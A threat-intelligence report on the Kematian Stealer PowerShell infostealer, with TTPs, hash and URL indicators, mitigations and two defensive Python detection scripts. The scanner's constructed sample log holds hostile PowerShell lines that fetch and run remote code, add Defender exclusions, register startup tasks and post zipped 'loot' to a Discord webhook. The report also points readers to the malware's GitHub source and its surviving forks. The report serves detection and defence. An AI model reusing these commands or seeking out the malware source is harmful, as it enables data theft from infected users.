RESEARCH: Kematian Stealer
This malware is designed to covertly exfiltrate sensitive data from infected systems. Great, GitHub is hosting more malware. Awesome.
Research Summary
The task was to perform a deep and technical analysis of "Kematian Stealer," a newly identified PowerShell-based information stealer. This malware is designed to covertly exfiltrate sensitive data from infected systems. Understanding its tactics, techniques, and procedures (TTPs), indicators of compromise (IoCs), and detection methods is crucial for developing effective defensive strategies.
Findings
Kematian Stealer is an evolving, openly developed threat that uses PowerShell scripts to collect and exfiltrate data from Windows systems. It is distributed as an open-source tool on GitHub, which makes it easily accessible to cybercriminals. The malware extracts a wide array of sensitive information from various applications, including messaging apps, gaming platforms, VPN services, email clients, FTP clients, password managers, and cryptocurrency wallets. It employs several techniques to maintain persistence and evade detection, and it exfiltrates the collected data via Discord webhooks.
Tactics, Techniques, and Procedures (TTPs)
- Initial Access and Execution:
  - The malware is typically distributed via spam or phishing emails containing a RAR archive with a loader binary.
  - Upon execution, the loader deploys batch and PowerShell scripts that collect sensitive user information and download additional malicious binaries.
- Persistence:
  - The malware creates scheduled tasks to ensure persistence, allowing it to execute at system startup with elevated privileges.
  - It adds specific directories to the Windows Defender exclusion list to prevent detection. Both steps require administrative rights and both are logged: scheduled-task creation is Security event 4698 (when "Audit Other Object Access Events" is enabled), and a Defender configuration change is event 5007 in the Microsoft-Windows-Windows Defender/Operational log.
- Defense Evasion:
  - The scripts are obfuscated to evade detection by security software.
  - The malware uses in-memory execution techniques to avoid writing payloads to disk, thereby evading traditional file-based detection. PowerShell script block logging (event 4104) still records the de-obfuscated code as it runs, so it is the primary source for hunting this stage.
- Information Collection:
  - Kematian Stealer targets a wide range of applications to extract sensitive information, including credentials, session data, and configuration files.
  - It captures images using the webcam, takes screenshots of the desktop, and processes browser cookie files.
- Exfiltration:
  - The collected data is compressed into a ZIP file and exfiltrated via Discord webhooks. Because the webhook lives on discord.com, this traffic blends in with legitimate Discord use and is not stopped by a blocklist of known-malicious domains.
  - The malware deletes temporary files and the executed PowerShell script to minimize evidence.
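Added example, not code from the original report or from the Kematian project: a small Python triage pass that reassembles PowerShell script block log (event 4104) fragments and scores each block against the TTPs listed above. The log records, host names, URLs and webhook are constructed for the demonstration, and the rule patterns are approximations of the described behaviours that would need tuning against real script-block logs.

```python
import re
from collections import defaultdict

# Detection rules for the behaviours described in the TTP list above. Each entry is
# (name, regex over the reassembled script block text). Patterns are deliberately loose
# (case-insensitive, tolerant of parameter order) because the scripts are obfuscated.
TTP_RULES = [
    ("in_memory_download", re.compile(
        r"(?:\bIEX\b|Invoke-Expression)[^\n]*\.DownloadString\(", re.I)),
    ("defender_exclusion", re.compile(
        r"Add-MpPreference\b[^\n]*-ExclusionPath", re.I)),
    ("scheduled_task_startup", re.compile(
        r"New-ScheduledTaskTrigger\s+-AtStartup"
        r"|Register-ScheduledTask\b[^\n]*-RunLevel\s+Highest"
        r"|schtasks(?:\.exe)?\s+/create\b[^\n]*/(?:sc\s+onstart|rl\s+highest)", re.I)),
    ("zip_staging", re.compile(
        r"Compress-Archive\b|\[(?:System\.)?IO\.Compression\.ZipFile\]", re.I)),
    ("discord_webhook", re.compile(
        r"https?://(?:ptb\.|canary\.)?discord(?:app)?\.com/api/webhooks/\d+/[\w-]+", re.I)),
    ("self_delete", re.compile(
        r"Remove-Item\b[^\n]*\$(?:PSCommandPath|MyInvocation\.MyCommand\.(?:Path|Definition))", re.I)),
]

# Constructed sample of Microsoft-Windows-PowerShell/Operational 4104 events, reduced to the
# fields that matter. A long script block is logged as several events sharing one
# ScriptBlockId, so fragments must be joined before matching or a rule whose evidence
# sits in another fragment is missed.
SAMPLE_4104 = [
    {"host": "WS01", "ScriptBlockId": "a1", "MessageNumber": 1, "MessageTotal": 2,
     "ScriptBlockText": (
         "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/stage2.ps1')\n"
         "Add-MpPreference -ExclusionPath \"$env:APPDATA\\svc\" -Force\n"
         "$t = New-ScheduledTaskTrigger -AtStartup\n")},
    {"host": "WS01", "ScriptBlockId": "a1", "MessageNumber": 2, "MessageTotal": 2,
     "ScriptBlockText": (
         "Register-ScheduledTask -TaskName Svc -Trigger $t -Action $a -RunLevel Highest\n"
         "Compress-Archive -Path $env:TEMP\\loot -DestinationPath $env:TEMP\\loot.zip\n"
         "Invoke-RestMethod -Uri 'https://discord.com/api/webhooks/123456789012345678/AbCdEf-ghIJ_klmn'"
         " -Method Post -Form @{file = Get-Item $env:TEMP\\loot.zip}\n"
         "Remove-Item $PSCommandPath -Force\n")},
    # Benign admin housekeeping: one rule fires, which should not raise an alert on its own.
    {"host": "WS02", "ScriptBlockId": "b7", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "Get-ChildItem C:\\Logs | Compress-Archive -DestinationPath C:\\Logs\\old.zip\n"},
]


def reassemble(events):
    """Join 4104 fragments by (host, ScriptBlockId) in MessageNumber order.

    Returns {(host, id): (text, complete)}; complete is False when fragments are missing.
    Incomplete blocks are still scanned, but the flag matters when reading the verdict."""
    groups = defaultdict(list)
    for ev in events:
        groups[(ev["host"], ev["ScriptBlockId"])].append(ev)
    blocks = {}
    for key, frags in groups.items():
        frags.sort(key=lambda e: e["MessageNumber"])
        text = "".join(f["ScriptBlockText"] for f in frags)
        blocks[key] = (text, len(frags) == frags[0]["MessageTotal"])
    return blocks


def match_ttps(text):
    """Names of the TTP rules that fire on one script block, in TTP_RULES order."""
    return [name for name, rx in TTP_RULES if rx.search(text)]


def triage(events, min_hits=2):
    """Return {(host, id): {"ttps": [...], "complete": bool}} for blocks with >= min_hits.

    Any single rule has benign uses (admins zip logs, installers add exclusions); the
    stealer chains several in one script, so the threshold is what separates them."""
    findings = {}
    for key, (text, complete) in reassemble(events).items():
        hits = match_ttps(text)
        if len(hits) >= min_hits:
            findings[key] = {"ttps": hits, "complete": complete}
    return findings


if __name__ == "__main__":
    for (host, block_id), f in triage(SAMPLE_4104).items():
        print(f"{host} block {block_id} complete={f['complete']}: {', '.join(f['ttps'])}")
```

The threshold is the important design choice: every rule above matches some legitimate administration script, but a single block that adds a Defender exclusion, registers a startup task, zips a directory and posts it to a Discord webhook has no benign explanation. Script block logging must be enabled by policy for any of this to exist; if it is not, the in-memory stage leaves nothing on disk to scan.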
Indicators of Compromise (IoCs)
- File Hashes (MD5):
  - 736376a77af0a4eb7108ba02d989c137 (RAR archive)
  - 02f3b7596cff59b0a04fd2b0676bc395 (loader binary)
  - d2ea85153d712cce3ea2abd1a593a028 (batch file)
  - a3619b0a3ee7b7138cefb9f7e896f168 (PowerShell script)
  - 18b5977b1a59c585f00ed7dca0fa81c9 (builder)
  - 80cf2d7ae1f3acc750f2cf454b4832c6 (Kematian.bin)
- URLs:
  - hxxps://github[.]com/KDot227/Powershell-Token-Grabber/releases/download/Fixed_version/main[.]exe
  - hxxps://github[.]com/Somali-Devs/Kematian-Stealer/releases/download/Fixed_version/main[.]exe
  - hxxps://github[.]com/Somali-Devs/Kematian-Stealer/
  - hxxps://github[.]com/Somali-Devs/Kematian-Stealer/releases/download/AutoBuild/main[.]exe
  - hxxps://github[.]com/Somali-Devs/Kematian-Stealer/blob/main/frontend-src/main.ps1
  - hxxps://raw[.]githubusercontent[.]com/Somali-Devs/Kematian-Stealer/main/frontend-src/blockhosts[.]ps1
  - hxxps://github[.]com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/antivm[.]ps1
  - hxxps://raw[.]githubusercontent[.]com/Somali-Devs/Kematian-Stealer/main/frontend-src/kematian_shellcode[.]ps1
  - hxxps://github[.]com/Somali-Devs/Kematian-Stealer/releases/download/KematianBuild/kematian[.]bin
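Added example, not from the report or any of the cited sources: Python that refangs the IoC list above, matches it against proxy log lines on host plus path rather than on the bare domain (github.com cannot simply be blocked), and normalises hash case for lookups. The proxy log lines, client addresses and log format are constructed for the demonstration.

```python
import re
from urllib.parse import urlsplit

# The IoCs from the list above, kept in the report's defanged form so they can be
# pasted in as published and refanged only in memory.
DEFANGED_URLS = [
    "hxxps://github[.]com/KDot227/Powershell-Token-Grabber/releases/download/Fixed_version/main[.]exe",
    "hxxps://github[.]com/Somali-Devs/Kematian-Stealer/releases/download/Fixed_version/main[.]exe",
    "hxxps://github[.]com/Somali-Devs/Kematian-Stealer/",
    "hxxps://github[.]com/Somali-Devs/Kematian-Stealer/releases/download/AutoBuild/main[.]exe",
    "hxxps://github[.]com/Somali-Devs/Kematian-Stealer/blob/main/frontend-src/main.ps1",
    "hxxps://raw[.]githubusercontent[.]com/Somali-Devs/Kematian-Stealer/main/frontend-src/blockhosts[.]ps1",
    "hxxps://github[.]com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/antivm[.]ps1",
    "hxxps://raw[.]githubusercontent[.]com/Somali-Devs/Kematian-Stealer/main/frontend-src/kematian_shellcode[.]ps1",
    "hxxps://github[.]com/Somali-Devs/Kematian-Stealer/releases/download/KematianBuild/kematian[.]bin",
]
# MD5s from the list above, normalised to lowercase once so lookups are case-insensitive.
MD5_IOCS = {
    "736376a77af0a4eb7108ba02d989c137": "RAR archive",
    "02f3b7596cff59b0a04fd2b0676bc395": "loader binary",
    "d2ea85153d712cce3ea2abd1a593a028": "batch file",
    "a3619b0a3ee7b7138cefb9f7e896f168": "PowerShell script",
    "18b5977b1a59c585f00ed7dca0fa81c9": "builder",
    "80cf2d7ae1f3acc750f2cf454b4832c6": "kematian.bin",
}


def refang(ioc):
    """Undo the common defanging conventions (hxxp, [.], [:]) to get a comparable value."""
    return (ioc.replace("hxxps://", "https://").replace("hxxp://", "http://")
               .replace("[.]", ".").replace("[:]", ":"))


def url_key(url):
    """Reduce a URL to (host, path): scheme, port, query and fragment must not break a match."""
    parts = urlsplit(url)
    return (parts.hostname or "").lower(), parts.path


IOC_KEYS = [url_key(refang(u)) for u in DEFANGED_URLS]
IOC_HOSTS = {host for host, _ in IOC_KEYS}


def classify_url(url):
    """Verdict for one requested URL, or None.

    exact     host and path equal an IoC
    prefix    path lies under a repository-level IoC (one whose path ends in "/")
    host_only the log carried only a host, as a TLS CONNECT line does; inconclusive,
              because github.com and raw.githubusercontent.com are overwhelmingly benign,
              so this is a lead for proxy/EDR inspection, not a blocking decision."""
    host, path = url_key(url)
    if host not in IOC_HOSTS:
        return None
    paths = [p for h, p in IOC_KEYS if h == host]
    if path in paths:
        return "exact"
    if any(p.endswith("/") and path.startswith(p) for p in paths):
        return "prefix"
    if path in ("", "/"):
        return "host_only"
    return None


# Constructed proxy log lines: "<timestamp> <client> <method> <url> <status>".
SAMPLE_PROXY_LOG = """\
2024-06-12T10:04:31Z 10.0.0.23 GET https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/blockhosts.ps1 200
2024-06-12T10:04:32Z 10.0.0.23 GET https://github.com/Somali-Devs/Kematian-Stealer/releases/download/KematianBuild/kematian.bin?raw=true 302
2024-06-12T10:04:40Z 10.0.0.23 GET https://github.com/Somali-Devs/Kematian-Stealer/archive/refs/heads/main.zip 200
2024-06-12T10:05:10Z 10.0.0.41 GET https://raw.githubusercontent.com/PowerShell/PowerShell/master/README.md 200
2024-06-12T10:06:02Z 10.0.0.57 CONNECT github.com:443 200
"""
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3})$")


def scan_proxy_log(text):
    """Return [(client, verdict, url)] for every line that matches an IoC in some way."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = m["url"] if "://" in m["url"] else "https://" + m["url"]  # CONNECT host:port
        verdict = classify_url(url)
        if verdict:
            hits.append((m["client"], verdict, m["url"]))
    return hits


def check_md5(digest):
    """Look up a file hash against the IoC set, whatever case the tool reported it in."""
    return MD5_IOCS.get(digest.strip().lower())


if __name__ == "__main__":
    for client, verdict, url in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(f"{client} {verdict:9} {url}")
    print(check_md5("D2EA85153D712CCE3EA2ABD1A593A028"))
```

Two caveats follow from the list itself. First, it contains no exfiltration endpoint: the Discord webhook is chosen per build, so exfiltration has to be caught on the wire (HTTPS POSTs to discord.com/api/webhooks/) or in script-block logs, not from a static list. Second, a proxy that only sees TLS CONNECT requests never sees the path, so for hosts like github.com the best a host-only match can do is point an analyst at the endpoint.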
Mitigation Strategies
- Endpoint Security:
  - Deploy endpoint security solutions with advanced threat detection and prevention capabilities.
  - Use reputable antivirus and anti-malware software to detect and remove malicious payloads quickly, and alert on changes to its exclusion list, since this stealer adds its own directories to the Windows Defender exclusions.
- System Updates:
  - Keep operating systems, applications, and security software up to date with regular patches to mitigate known vulnerabilities.
- Network Segmentation:
  - Implement network segmentation to restrict lateral movement, preventing malware from reaching critical assets.
- Employee Training:
  - Conduct comprehensive employee training on recognizing phishing threats and social engineering tactics, including the RAR-attachment lure used here.
- Firewall Configuration:
  - Configure firewalls to block outbound communication with known malicious IP addresses and domains associated with command-and-control servers. This alone does not stop Kematian's exfiltration, which goes to Discord webhooks on discord.com; that requires blocking Discord where it is not a business need, or inspecting outbound HTTPS for POSTs to discord.com/api/webhooks/.
- Behavior Monitoring:
  - Employ behavior-based monitoring to detect unusual activity patterns, such as powershell.exe adding Defender exclusions, registering scheduled tasks that run at startup with highest privileges, or making unauthorized network connections.
- Application Whitelisting:
  - Enforce application whitelisting policies to allow only approved applications, preventing the execution of unauthorized or malicious executables. For a PowerShell-based stealer this means AppLocker or WDAC script rules (which also put unapproved scripts into Constrained Language Mode), not only executable rules, because the loader runs through powershell.exe, a signed Microsoft binary.
- Network Traffic Monitoring:
  - Monitor network traffic for abnormal patterns, such as large data transfers to unfamiliar or suspicious IP addresses, and for ZIP uploads from endpoints to discord.com/api/webhooks/ paths, which is how this stealer sends its collected data.
- Incident Response Plan:
  - Develop a comprehensive incident response plan detailing necessary actions in the event of a malware infection.
- Regular Backups:
  - Implement regular backups of critical data and systems to minimize the impact of ransomware attacks or data loss resulting from malware infections.
- Least Privilege Principle:
  - Follow the principle of least privilege (PoLP) by restricting user permissions to only those necessary for specific roles. Kematian's scheduled-task persistence and Defender-exclusion steps both need administrative rights, so users who work without local admin deny it both.
- Threat Intelligence:
  - Stay updated with the latest threat intelligence reports and indicators of compromise related to malware.
References and Citations
- CYFIRMA Report on Kematian Stealer
- PCRisk Removal Guide
- Malware.News Analysis
- GitHub Repository
- AlienVault OTX Report
- Cybersecurity News Article
- Hive Pro Threat Advisory
- Broadcom Security Bulletin
(The GitHub repo has since been 404'd, which doesn't reduce the utility of the research; it's been forked, and you can find it.)
Get questions like this? Do they take chunks out of your day? Would you rather be working on more interesting intelligence tasks? Would you like help with the research?
This baseline report was thoughtfully researched and took 5 minutes. It's meant to be a rough draft for you to enhance with the unique insights that make you an invaluable analyst. We just did the grunt work.
Did this help you? Forward it to a friend!
(c) 2024 CSIRT Gadgets, LLC
License - CC BY-SA 4.0